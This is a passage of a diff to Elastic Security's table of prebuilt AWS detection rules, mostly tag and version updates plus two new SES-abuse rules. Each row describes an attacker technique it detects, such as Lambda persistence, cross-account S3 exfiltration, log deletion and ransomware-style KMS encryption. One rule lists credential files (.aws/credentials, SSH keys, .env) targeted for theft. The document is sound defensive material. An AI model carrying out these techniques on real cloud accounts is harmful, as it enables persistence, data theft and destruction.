Amazon MSK or self-managed Apache Kafka topic, or an Amazon MQ broker to a Lambda function so the function is automatically invoked when new records arrive. Adversaries with "lambda:CreateEventSourceMapping" permissions can abuse this to establish stealthy, event-driven persistence and execution, or to continuously siphon records from a stream or queue into attacker-controlled function code. Because the function then runs on its own whenever the source produces events, this grants durable execution without any further interactive activity by the adversary. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Data Source: AWS Lambda], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 -|<> |Identifies when an AWS Lambda function is created or updated. AWS Lambda lets you run code without provisioning or managing servers. Adversaries can create or update Lambda functions to execute malicious code, exfiltrate data, or escalate privileges. This is a [building block rule](https://www.elastic.co/guide/en/security/current/building-block-rule.html) that does not generate alerts, but signals when a Lambda function is created or updated that matches the rule's conditions. To generate alerts, create a rule that uses this signal as a building block. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Lambda], [Use Case: Asset Visibility], [Tactic: Execution], [Rule Type: BBR] |None |4 +|<> |Identifies when an AWS Lambda function is created or updated. AWS Lambda lets you run code without provisioning or managing servers. Adversaries can create or update Lambda functions to execute malicious code, exfiltrate data, or escalate privileges. This is a [building block rule](https://www.elastic.co/guide/en/security/current/building-block-rule.html) that does not generate alerts, but signals when a Lambda function is created or updated that matches the rule's conditions. To generate alerts, create a rule that uses this signal as a building block. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Lambda], [Tactic: Execution], [Rule Type: BBR] |None |5 -|<> |Identifies the deletion of an AWS Lambda function. Deleting a function removes its code, configuration, versions, and aliases. Adversaries may delete functions to disrupt business operations and automated workflows, to destroy attacker-deployed backdoors and remove evidence after achieving their objective, or to inhibit incident response. Because function deletion is destructive and often irreversible without redeployment, deletions performed by unexpected principals or outside change windows should be reviewed. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Lambda], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |1 +|<> |Identifies the deletion of an AWS Lambda function. Deleting a function removes its code, configuration, versions, and aliases. Adversaries may delete functions to disrupt business operations and automated workflows, to destroy attacker-deployed backdoors and remove evidence after achieving their objective, or to inhibit incident response. Because function deletion is destructive and often irreversible without redeployment, deletions performed by unexpected principals or outside change windows should be reviewed. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Lambda], [Tactic: Impact], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |2 |<> |Identifies a single principal directly invoking AWS Lambda functions at a high volume within a one-hour window. Adversaries may drive excessive invocations to abuse functions for resource hijacking or cryptomining, to inflate costs in a denial-of-wallet attack, or to enumerate function behavior. This is a volumetric heuristic: the threshold is environment-dependent and high-throughput applications can exceed it, so tune it to the deployment. This rule relies on AWS Lambda data event logging, which is not enabled by default. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Data Source: AWS Lambda], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |2 @@ -288,11 +300,11 @@ and their rule type is `machine_learning`. |<> |Identifies a change to an AWS Lambda function resource policy that grants invoke permissions to an AWS account principal. Using AddPermission, an adversary can authorize a principal in another account to call a function, creating a cross-account backdoor for execution or for relaying data to attacker-controlled infrastructure without modifying the function's code. This rule excludes public grants (principal set to "*"), which are covered by a separate rule, and grants to AWS service principals, which are common for legitimate event triggers. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Lambda], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 -|<> |Identifies when an AWS Lambda function policy is updated to allow public invocation. This rule detects use of the AddPermission API where the Principal is set to "*", enabling any AWS account to invoke the function. Adversaries may abuse this configuration to establish persistence, create a covert execution path, or operate a function as an unauthenticated backdoor. Public invocation is rarely required outside very specific workloads and should be considered high-risk when performed unexpectedly. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Lambda], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide] |None |9 +|<> |Identifies when an AWS Lambda function policy is updated to allow public invocation. This rule detects use of the AddPermission API where the Principal is set to "*", enabling any AWS account to invoke the function. Adversaries may abuse this configuration to establish persistence, create a covert execution path, or operate a function as an unauthenticated backdoor. Public invocation is rarely required outside very specific workloads and should be considered high-risk when performed unexpectedly. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Lambda], [Tactic: Persistence], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |10 -|<> |Identifies the creation or update of an AWS Lambda function URL configured with an authentication type of NONE, which exposes the function to unauthenticated invocation directly from the public internet. Adversaries can use a public function URL to establish a durable, internet-reachable entry point for command and control, data egress, or on-demand execution of attacker-controlled code, bypassing the need for valid AWS credentials to invoke the function. Function URLs with public access should be rare and deliberate, so this configuration warrants review. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Lambda], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |2 +|<> |Identifies the creation or update of an AWS Lambda function URL configured with an authentication type of NONE, which exposes the function to unauthenticated invocation directly from the public internet. Adversaries can use a public function URL to establish a durable, internet-reachable entry point for command and control, data egress, or on-demand execution of attacker-controlled code, bypassing the need for valid AWS credentials to invoke the function. Function URLs with public access should be rare and deliberate, so this configuration warrants review. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Lambda], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |3 -|<> |Identifies when a Lambda layer is added to an existing AWS Lambda function. Lambda layers allow shared code, dependencies, or runtime modifications to be injected into a function’s execution environment. Adversaries with the ability to update function configurations may add a malicious layer to establish persistence, run unauthorized code, or intercept data handled by the function. This activity should be reviewed to ensure the modification is expected and authorized. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Lambda], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide] |None |9 +|<> |Identifies when a Lambda layer is added to an existing AWS Lambda function. Lambda layers allow shared code, dependencies, or runtime modifications to be injected into a function’s execution environment. Adversaries with the ability to update function configurations may add a malicious layer to establish persistence, run unauthorized code, or intercept data handled by the function. This activity should be reviewed to ensure the modification is expected and authorized. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Lambda], [Tactic: Execution], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |10 |<> |Identifies the modification of an AWS Lambda layer permission policy to grant another AWS account, an AWS Organization, or the public the ability to use a layer version. Lambda layers package code and dependencies that are loaded into the execution environment of any function that references them. Sharing a layer with an external account or with everyone can leak proprietary code or secrets bundled in the layer, and can serve as a supply-chain mechanism whereby downstream functions load attacker-influenced code. Layer sharing should be infrequent and deliberate, so newly granted external or public access warrants review. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Lambda], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 @@ -304,17 +316,17 @@ and their rule type is `machine_learning`. |<> |Identifies a principal that, within a short window, both registers an Amazon ECS task definition using a public / non-ECR container image at a high CPU allocation (8 or 16 vCPU) AND launches ECS workloads (RunTask, StartTask, or CreateService). Registering a public miner image at maximum compute and then launching it is the ECS/Fargate cryptocurrency-mining deployment pattern seen after credential compromise. Requiring both the mining-signature registration and a launch by the same principal confirms an actual deployment rather than a standalone (possibly benign) task-definition registration, which sharply reduces false positives from high-compute workloads that are merely registered. |[Domain: Cloud], [Data Source: AWS], [Data Source: AWS CloudTrail], [Data Source: Amazon Web Services], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |1 -|<> |Identifies the creation or modification of an Amazon RDS DB instance or cluster where the "publiclyAccessible" attribute is set to "true". Publicly accessible RDS instances expose a network endpoint on the public internet, which may allow unauthorized access if combined with overly permissive security groups, weak authentication, or misconfigured IAM policies. Adversaries may enable public access on an existing instance, or create a new publicly accessible instance, to establish persistence, move data outside of controlled network boundaries, or bypass internal access controls. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS RDS], [Resources: Investigation Guide], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion] |None |9 +|<> |Identifies the creation or modification of an Amazon RDS DB instance or cluster where the "publiclyAccessible" attribute is set to "true". Publicly accessible RDS instances expose a network endpoint on the public internet, which may allow unauthorized access if combined with overly permissive security groups, weak authentication, or misconfigured IAM policies. Adversaries may enable public access on an existing instance, or create a new publicly accessible instance, to establish persistence, move data outside of controlled network boundaries, or bypass internal access controls. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS RDS], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |10 |<> |Identifies the restoration of an AWS RDS database instance from a snapshot or S3 backup. Adversaries with access to valid credentials may restore copies of existing databases to bypass logging and monitoring controls or to exfiltrate sensitive data from a duplicated environment. This rule detects successful restoration operations using "RestoreDBInstanceFromDBSnapshot" or "RestoreDBInstanceFromS3", which may indicate unauthorized data access or post-compromise defense evasion. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS RDS], [Use Case: Asset Visibility], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |214 -|<> |Identifies the deletion of an Amazon RDS DB instance, Aurora cluster, or global database cluster. Deleting these resources permanently destroys stored data and can cause major service disruption. Adversaries with sufficient permissions may delete RDS resources to impede recovery, destroy evidence, or inflict operational impact on the environment. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS RDS], [Use Case: Asset Visibility], [Tactic: Impact], [Resources: Investigation Guide] |None |212 +|<> |Identifies the deletion of an Amazon RDS DB instance, Aurora cluster, or global database cluster. Deleting these resources permanently destroys stored data and can cause major service disruption. Adversaries with sufficient permissions may delete RDS resources to impede recovery, destroy evidence, or inflict operational impact on the environment. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS RDS], [Tactic: Impact], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |213 -|<> |Identifies the modification of an AWS RDS DB instance or cluster to disable the deletionProtection feature. Deletion protection prevents accidental or unauthorized deletion of RDS resources. Adversaries with sufficient permissions may disable this protection as a precursor to destructive actions, including the deletion of databases containing sensitive or business-critical data. This rule alerts when deletionProtection is explicitly set to false on an RDS DB instance or cluster. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS RDS], [Resources: Investigation Guide], [Use Case: Threat Detection], [Tactic: Impact] |None |9 +|<> |Identifies the modification of an AWS RDS DB instance or cluster to disable the deletionProtection feature. Deletion protection prevents accidental or unauthorized deletion of RDS resources. Adversaries with sufficient permissions may disable this protection as a precursor to destructive actions, including the deletion of databases containing sensitive or business-critical data. This rule alerts when deletionProtection is explicitly set to false on an RDS DB instance or cluster. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS RDS], [Tactic: Impact], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |10 |<> |Identifies the modification of the master password for an AWS RDS DB instance or cluster. Changing the master password is a legitimate recovery action when access is lost, but adversaries with sufficient permissions may modify it to regain access, establish persistence, bypass existing controls, or escalate privileges within a compromised environment. Because RDS does not expose the password in API responses, this operation can meaningfully alter access pathways to sensitive data stores. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS RDS], [Resources: Investigation Guide], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Defense Evasion] |None |9 -|<> |Identifies when an AWS RDS DB Snapshot is created. This can be used to evade defenses by allowing an attacker to bypass access controls or cover their tracks by reverting an instance to a previous state. This is a [building block rule](https://www.elastic.co/guide/en/security/current/building-block-rule.html) and does not generate alerts on its own. It is meant to be used for correlation with other rules to detect suspicious activity. To generate alerts, create a rule that uses this signal as a building block. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS RDS], [Use Case: Asset Visibility], [Tactic: Defense Evasion], [Rule Type: BBR] |None |3 +|<> |Identifies when an AWS RDS DB Snapshot is created. This can be used to evade defenses by allowing an attacker to bypass access controls or cover their tracks by reverting an instance to a previous state. This is a [building block rule](https://www.elastic.co/guide/en/security/current/building-block-rule.html) and does not generate alerts on its own. It is meant to be used for correlation with other rules to detect suspicious activity. To generate alerts, create a rule that uses this signal as a building block. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS RDS], [Tactic: Defense Evasion], [Rule Type: BBR] |None |4 |<> |Identifies when an AWS RDS DB snapshot is shared with another AWS account or made public. DB snapshots contain complete backups of database instances, including schemas, table data, and sensitive application content. When shared externally, snapshots can be restored in another AWS environment, enabling unauthorized access, offline analysis, or data exfiltration. Adversaries who obtain valid credentials or exploit misconfigurations may modify snapshot attributes to grant access to accounts they control, bypassing network, IAM, and monitoring controls. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS RDS], [Resources: Investigation Guide], [Use Case: Threat Detection], [Tactic: Exfiltration] |None |8 @@ -328,37 +340,41 @@ and their rule type is `machine_learning`. |<> |Identifies when an AWS Route 53 domain is transferred to another AWS account. Transferring a domain changes administrative control of the DNS namespace, enabling the receiving account to modify DNS records, route traffic, request certificates, and potentially hijack operational workloads. Adversaries who gain access to privileged IAM users or long-lived credentials may leverage domain transfers to establish persistence, redirect traffic, conduct phishing, or stage infrastructure for broader attacks. This rule detects successful domain transfer requests. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Route 53], [Use Case: Asset Visibility], [Tactic: Persistence], [Tactic: Resource Development], [Resources: Investigation Guide] |None |212 -|<> |Identifies when an AWS Route 53 private hosted zone is associated with a new Virtual Private Cloud (VPC). Private hosted zones restrict DNS resolution to specific VPCs, and associating additional VPCs expands the scope of what networks can resolve internal DNS records. Adversaries with sufficient permissions may associate unauthorized VPCs to intercept, observe, or reroute internal traffic, establish persistence, or expand their visibility within an AWS environment. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Route 53], [Use Case: Asset Visibility], [Tactic: Persistence], [Tactic: Resource Development], [Resources: Investigation Guide] |None |213 +|<> |Identifies when an AWS Route 53 private hosted zone is associated with a new Virtual Private Cloud (VPC). Private hosted zones restrict DNS resolution to specific VPCs, and associating additional VPCs expands the scope of what networks can resolve internal DNS records. Adversaries with sufficient permissions may associate unauthorized VPCs to intercept, observe, or reroute internal traffic, establish persistence, or expand their visibility within an AWS environment. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Route 53], [Tactic: Persistence], [Tactic: Resource Development], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |214 |<> |Identifies the deletion of an Amazon Route 53 Resolver Query Log Configuration. Resolver query logs provide critical visibility into DNS activity across VPCs, including lookups made by EC2 instances, containers, Lambda functions, and other AWS resources. Deleting a query log configuration immediately stops DNS query and response logging for the associated VPC. Adversaries may delete these configurations to evade detection, suppress forensic evidence, or degrade security monitoring capabilities. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Route 53], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |8 |<> |Detects a principal modifying an S3 bucket ACL to grant public read or write access that has not been observed doing so within the history window, using canned ACLs such as public-read or public-read-write. ACL-based public access is a distinct API path (PutBucketAcl) that can bypass some Block Public Access controls. Monitoring for new identities performing this change helps surface freshly compromised credentials being used to stage data for exfiltration or inadvertently expose sensitive content. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon S3], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |1 -|<> |Identifies the deletion of critical Amazon S3 bucket configurations such as bucket policies, lifecycle configurations or encryption settings. These actions are typically administrative but may also represent adversarial attempts to remove security controls, disable data retention mechanisms, or conceal evidence of malicious activity. Adversaries who gain access to AWS credentials may delete logging, lifecycle, or policy configurations to disrupt forensic visibility and inhibit recovery. For example, deleting a bucket policy can open a bucket to public access or remove protective access restrictions, while deleting lifecycle rules can prevent object archival or automatic backups. Such actions often precede data exfiltration or destructive operations and should be reviewed in context with related S3 or IAM events. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon S3], [Use Case: Asset Visibility], [Tactic: Defense Evasion], [Tactic: Impact], [Resources: Investigation Guide] |None |214 +|<> |Identifies the deletion of critical Amazon S3 bucket configurations such as bucket policies, lifecycle configurations or encryption settings. These actions are typically administrative but may also represent adversarial attempts to remove security controls, disable data retention mechanisms, or conceal evidence of malicious activity. Adversaries who gain access to AWS credentials may delete logging, lifecycle, or policy configurations to disrupt forensic visibility and inhibit recovery. For example, deleting a bucket policy can open a bucket to public access or remove protective access restrictions, while deleting lifecycle rules can prevent object archival or automatic backups. Such actions often precede data exfiltration or destructive operations and should be reviewed in context with related S3 or IAM events. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS S3], [Tactic: Defense Evasion], [Tactic: Impact], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |215 |<> |Identifies a high number of failed S3 operations against a single bucket from a single source address within a short timeframe. This activity can indicate attempts to collect bucket objects or cause an increase in billing to an account via internal "AccessDenied" errors. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Resources: Investigation Guide], [Use Case: Log Auditing], [Tactic: Impact], [Tactic: Discovery], [Tactic: Collection] |None |9 -|<> |Identifies the addition of an expiration lifecycle configuration to an Amazon S3 bucket. S3 lifecycle rules can automatically delete or transition objects after a defined period. Adversaries can abuse them by configuring auto-deletion of logs, forensic evidence, or sensitive objects to cover their tracks. This rule detects the use of the PutBucketLifecycle or PutBucketLifecycleConfiguration APIs with Expiration parameters, which may indicate an attempt to automate the removal of data to hinder investigation or maintain operational secrecy after malicious activity. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon S3], [Use Case: Asset Visibility], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |8 +|<> |Identifies the addition of an expiration lifecycle configuration to an Amazon S3 bucket. S3 lifecycle rules can automatically delete or transition objects after a defined period. Adversaries can abuse them by configuring auto-deletion of logs, forensic evidence, or sensitive objects to cover their tracks. This rule detects the use of the PutBucketLifecycle or PutBucketLifecycleConfiguration APIs with Expiration parameters, which may indicate an attempt to automate the removal of data to hinder investigation or maintain operational secrecy after malicious activity. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS S3], [Tactic: Defense Evasion], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |9 |<> |Detects when an Amazon S3 bucket policy is modified to grant public access using a wildcard (Principal:"*") statement. This rule analyzes PutBucketPolicy events that include both Effect=Allow and Principal:"*" in the request parameters, indicating that permissions were extended to all identities, potentially making the bucket or its contents publicly accessible. Publicly exposing an S3 bucket is one of the most common causes of sensitive data leaks in AWS environments. Adversaries or misconfigurations can leverage this exposure to exfiltrate data, host malicious content, or collect credentials and logs left in open storage. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Threat Detection], [Tactic: Exfiltration], [Tactic: Collection], [Resources: Investigation Guide] |None |3 -|<> |Detects when an Amazon S3 bucket policy is modified to share access with an external AWS account. This rule analyzes PutBucketPolicy events and compares the S3 bucket’s account ID to any account IDs referenced in the policy’s Effect=Allow statements. If the policy includes principals from accounts other than the bucket owner’s, the rule triggers an alert. This behavior may indicate an adversary backdooring a bucket for data exfiltration or cross-account persistence. For example, an attacker who compromises credentials could attach a policy allowing access from an external AWS account they control, enabling continued access even after credentials are rotated. Note: This rule will not alert if the account ID is part of the bucket’s name or appears in the resource ARN. Such cases are common in standardized naming conventions (e.g., “mybucket-123456789012”). To ensure full coverage, use complementary rules to monitor for suspicious PutBucketPolicy API requests targeting buckets with account IDs embedded in their names or resources. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Threat Detection], [Tactic: Exfiltration], [Tactic: Collection], [Resources: Investigation Guide] |None |10 +|<> |Detects when an Amazon S3 bucket policy is modified to share access with an external AWS account. This rule analyzes PutBucketPolicy events and compares the S3 bucket’s account ID to any account IDs referenced in the policy’s Effect=Allow statements. If the policy includes principals from accounts other than the bucket owner’s, the rule triggers an alert. This behavior may indicate an adversary backdooring a bucket for data exfiltration or cross-account persistence. For example, an attacker who compromises credentials could attach a policy allowing access from an external AWS account they control, enabling continued access even after credentials are rotated. Note: This rule will not alert if the account ID is part of the bucket’s name or appears in the resource ARN. Such cases are common in standardized naming conventions (e.g., “mybucket-123456789012”). To ensure full coverage, use complementary rules to monitor for suspicious PutBucketPolicy API requests targeting buckets with account IDs embedded in their names or resources. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS S3], [Tactic: Collection], [Tactic: Exfiltration], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |11 -|<> |Identifies the creation or modification of an S3 bucket replication configuration that sends data to a bucket in a different AWS account. Cross-account replication can be used legitimately for backup, disaster recovery, and multi-account architectures, but adversaries with write access to an S3 bucket may abuse replication rules to silently exfiltrate large volumes of data to attacker-controlled accounts. This rule detects "PutBucketReplication" events where the configured destination account differs from the source bucket's account, indicating potential unauthorized cross-account data movement. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Resources: Investigation Guide], [Use Case: Threat Detection], [Tactic: Exfiltration] |None |9 +|<> |Identifies the creation or modification of an S3 bucket replication configuration that sends data to a bucket in a different AWS account. Cross-account replication can be used legitimately for backup, disaster recovery, and multi-account architectures, but adversaries with write access to an S3 bucket may abuse replication rules to silently exfiltrate large volumes of data to attacker-controlled accounts. This rule detects "PutBucketReplication" events where the configured destination account differs from the source bucket's account, indicating potential unauthorized cross-account data movement. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS S3], [Tactic: Exfiltration], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |10 -|<> |Identifies when server access logging is disabled for an Amazon S3 bucket. Server access logs provide a detailed record of requests made to an S3 bucket. When server access logging is disabled for a bucket, it could indicate an adversary's attempt to impair defenses by disabling logs that contain evidence of malicious activity. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon S3], [Use Case: Asset Visibility], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |8 +|<> |Identifies when server access logging is disabled for an Amazon S3 bucket. Server access logs provide a detailed record of requests made to an S3 bucket. When server access logging is disabled for a bucket, it could indicate an adversary's attempt to impair defenses by disabling logs that contain evidence of malicious activity. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS S3], [Tactic: Defense Evasion], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |9 |<> |Detects successful S3 GetObject calls targeting high-value credential and secret files commonly stored in S3 buckets: AWS credentials files (".aws/credentials", ".aws/config"), SSH private keys ("id_rsa", "id_ed25519", "id_ecdsa", "id_dsa"), environment files (".env"), PEM and PuTTY key files, and other private key patterns. These file types are high-yield targets for credential harvesting from S3. The rule excludes AWSService identity type to suppress S3 replication, Glacier restore, and other AWS-internal data movement that legitimately reads these files. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 |<> |Identifies use of the S3 CopyObject API where the destination object is encrypted using an AWS KMS key from an external AWS account. This behavior may indicate ransomware-style impact activity where an adversary with access to a misconfigured S3 bucket encrypts objects using a KMS key they control, preventing the bucket owner from decrypting their own data. This technique is a critical early signal of destructive intent or cross-account misuse. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Data Source: AWS KMS], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |13 -|<> |Identifies when object versioning is suspended for an Amazon S3 bucket. Object versioning allows for multiple versions of an object to exist in the same bucket. This allows for easy recovery of deleted or overwritten objects. When object versioning is suspended for a bucket, it could indicate an adversary's attempt to inhibit system recovery following malicious activity. Additionally, when versioning is suspended, buckets can then be deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |8 +|<> |Identifies when object versioning is suspended for an Amazon S3 bucket. Object versioning allows for multiple versions of an object to exist in the same bucket. This allows for easy recovery of deleted or overwritten objects. When object versioning is suspended for a bucket, it could indicate an adversary's attempt to inhibit system recovery following malicious activity. Additionally, when versioning is suspended, buckets can then be deleted. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS S3], [Tactic: Impact], [Rule Type: Event Correlation (EQL)], [Resources: Investigation Guide] |None |9 |<> |This rule detects when a JavaScript file is uploaded in an S3 static site directory (`static/js/`) by an IAM user or assumed role. This can indicate suspicious modification of web content hosted on S3, such as injecting malicious scripts into a static website frontend. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Tactic: Impact], [Use Case: Web Application Compromise], [Use Case: Cloud Threat Detection], [Resources: Investigation Guide] |None |10 |<> |Identifies AWS CloudTrail events where an unauthenticated source is attempting to access an S3 bucket. This activity may indicate a misconfigured S3 bucket policy that allows public access to the bucket, potentially exposing sensitive data to unauthorized users. Adversaries can specify --no-sign-request in the AWS CLI to retrieve objects from an S3 bucket without authentication. This is a New Terms rule, which means it will trigger for each unique combination of the source.address and targeted bucket name that has not been seen making this API request. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon S3], [Use Case: Asset Visibility], [Resources: Investigation Guide], [Tactic: Collection] |None |9 -|<> |Identifies when a user subscribes to an SNS topic using a new protocol type (ie. email, http, lambda, etc.). SNS allows users to subscribe to recieve topic messages across a broad range of protocols like email, sms, lambda functions, http endpoints, and applications. Adversaries may subscribe to an SNS topic to collect sensitive information or exfiltrate data via an external email address, cross-account AWS service or other means. This rule identifies a new protocol subscription method for a particular user. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS SNS], [Resources: Investigation Guide], [Use Case: Threat Detection], [Tactic: Exfiltration], [Tactic: Collection], [Tactic: Impact] |None |10 +|<> |Detects an SES email identity being verified and subsequently deleted within a 30-minute window, performed by the same AWS identity. Amazon SES requires email addresses and domains to be verified before they can be used as senders. An adversary who obtains SES credentials may verify a domain or address they control, use it to send phishing or spam email, then delete the identity to remove evidence of the sending domain from the account's verified identity list. This verify-use-delete pattern is a recognized attacker technique for SES abuse. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS SES], [Rule Type: ESQL], [Tactic: Resource Development], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |2 + +|<> |Detects the first occurrence in 7 days of an AWS identity attaching the managed policy AmazonSESFullAccess to an IAM user, role, or group. AmazonSESFullAccess grants unrestricted permission to send email, manage identities and templates, manage suppression lists, and access SES account-level settings. Granting this policy to an unexpected IAM entity, particularly a newly created user or a role not previously associated with email operations, is a documented technique used by threat actors to establish phishing infrastructure on compromised AWS accounts, enabling them to send email on behalf of the victim organization's trusted sending domain. Using new terms on the calling identity suppresses recurring attachments by known email automation while surfacing identities performing this action for the first time. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS], [Data Source: Amazon Web Services], [Service: AWS IAM], [Service: AWS SES], [Rule Type: New Terms], [Tactic: Persistence], [Tactic: Resource Development], [Resources: Investigation Guide] |None |1 + +|<> |Identifies when a user subscribes to an SNS topic using a new protocol type (ie. email, http, lambda, etc.). SNS allows users to subscribe to recieve topic messages across a broad range of protocols like email, sms, lambda functions, http endpoints, and applications. Adversaries may subscribe to an SNS topic to collect sensitive information or exfiltrate data via an external email address, cross-account AWS service or other means. This rule identifies a new protocol subscription method for a particular user. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS SNS], [Tactic: Collection], [Tactic: Exfiltration], [Tactic: Impact], [Rule Type: New Terms], [Resources: Investigation Guide] |None |11 |<> |Identifies when an SNS topic is created by a user who does not typically perform this action. Adversaries may create SNS topics to stage capabilities for data exfiltration or other malicious activities. This is a New Terms rule that only flags when this behavior is observed for the first time by a user or role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS SNS], [Resources: Investigation Guide], [Use Case: Threat Detection], [Tactic: Resource Development], [Tactic: Impact] |None |6 @@ -368,7 +384,7 @@ and their rule type is `machine_learning`. |<> |Identifies when an AWS Systems Manager (SSM) command document is created by a user or role who does not typically perform this action. Adversaries may create SSM command documents to execute commands on managed instances, potentially leading to unauthorized access, command and control, data exfiltration and more. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS SSM], [Data Source: AWS Systems Manager], [Resources: Investigation Guide], [Use Case: Threat Detection], [Tactic: Execution] |None |7 -|<> |Detects the rare occurrence of a user or role accessing AWS Systems 